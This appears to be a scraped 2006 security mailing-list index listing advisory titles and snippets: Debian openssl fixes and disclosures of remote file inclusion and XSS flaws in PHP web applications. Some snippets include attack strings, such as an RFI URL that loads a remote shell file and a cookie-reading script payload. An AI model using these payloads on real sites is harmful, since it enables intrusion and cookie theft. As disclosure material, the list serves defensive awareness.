|
|
Colapse all |
Post message
[SECURITY] [DSA 1173-1] New openssl packages fix RSA signature forgery cryptographic weakness 2006-09-10 Moritz Muehlenhoff (jmm debian org) PhpLinkExchange v1.0 RFI + RC + Xss [RC-exploit] 2006-09-09 ali hackerz ir vendor :www.idevspot.com Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange By : s3rv3r_hack3r www: hackerz.ir & h4ckerz.com remote file include : http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart =[shell.txt?] xss: http://www.domain.com/PhpLinkExchange/user_add.php?m [ more ] [ reply ] Re: [Full-disclosure] Re: RSA SecurID SID800 Token vulnerable by design 2006-09-10 Brian Eaton (eaton lists gmail com) On 9/9/06, Lyal Collins <lyal.collins (at) key2it.com (dot) au [email concealed]> wrote: > If there's malware on the machine, and there is a connected USB token, then > authentication is only as good as the password - malware can probe the > connected token as often as desired. <snip> > In theory, with trusted data paths everyw [ more ] [ reply ] HotPlug CMS Config File Include Vulnerability 2006-09-11 security soqor net Hello HotPlug CMS Config File Include Vulnerability Discovered by : HACKERS PAL Copyrights : HACKERS PAL Website : WwW.SoQoR.NeT Email : security (at) soqor (dot) net [email concealed] After Script Url Add includes/class/config.inc And you will download the config file ,, so that you will be able to connect by r [ more ] [ reply ] PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities 2006-09-10 l0x3 hotmail com +-------------------------------------------------------------------- + + ppalCart V(2.5 EE) Remote File Inclusion + +------------------------------------------------------------------- + + Affected Software .: Software + Version .............: ppalCart 2.5 EE + Venedor ...........: ht [ more ] [ reply ] Open Bulletin Board <= 1.0.8 (root_path) File Include Vulnerability 2006-09-10 l0x3 hotmail com +-------------------------------------------------------------------- + + Open Bulletin Board 1.0.8 ; Multiple Remote File Include Vulnerabilities + +------------------------------------------------------------------- + + Affected Software .: Software + Version .............: Open Bulletin [ more ] [ reply ] PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities 2006-09-10 l0x3 hotmail com +-------------------------------------------------------------------- + + PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities + +------------------------------------------------------------------- + + Affected Software .: Software + Version .............: PHP Ad [ more ] [ reply ] [SECURITY] [DSA 1174-1] New openssl096 packages fix RSA signature forgery cryptographic weakness 2006-09-11 Moritz Muehlenhoff (jmm debian org) XHP CMS v0.5.1 Vuls Xss and Full path vuls 2006-09-11 security soqor net Hello,, XHP CMS v0.5.1 Vuls Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security (at) soqor (dot) net [email concealed] Xss index.php?errcode=<script>alert(document.cookie);</script> Full path action.php?action=1&module=engine [ more ] [ reply ] Web Server Creator v0.1 (l) Remote Include Vulnerability 2006-09-08 x0r0n hotmail com ########################################################### #Web Server Creator v0.1 (l) Remote Include Vulnerability ############################################################ #Author: XORON ############################################################ #URL: http://www.comscripts.co [ more ] [ reply ] PUMA 1.0 RC 2 (config.php) Remote File Inclusion 2006-09-10 philipp niedziela gmx de +-------------------------------------------------------------------- + + PUMA 1.0 RC 2 (config.php) Remote File Inclusion + + Original advisory: + http://www.bb-pcsecurity.de/Websecurity/415/org/PUMA_1.0_RC_2_(config.ph p)_RFI.htm + +----------------------------------------------------------- [ more ] [ reply ] [SECURITY] [DSA 1159-2] New Mozilla Thunderbird packages fix several problems 2006-09-08 joey infodrom org (Martin Schulze) Vikingboard 0.1b Multiple Vulnerabilities 2006-09-08 no-replay Hessamx net ================================================ :: Vikingboard 0.1b Multiple Vulnerabilities :: ================================================ Software : Vikingboard Website : http://www.vikingboard.com/ Discover : Hessam-x / www.hessamx.net I. Cross Site Scripting Vulnerabilities --- [ more ] [ reply ] ConSec Symposium - Sept 20-22 in Austin, TX 2006-09-08 Michael Allgeier (Michael Allgeier lcra org) September 20-22 Austin, Texas http://www.consec.org ConSec, the Southwest Regional Symposium on Business Continuity, Information Security & IT Audit. This Symposium is celebrating 10 years running. Events in the last few years have heightened the need for and understanding of these topics. There ar [ more ] [ reply ] |
|
Privacy Statement |
Hash: SHA1
- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1173-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Noah Meyerhans
September 10th, 2006
[ more ] [ reply ]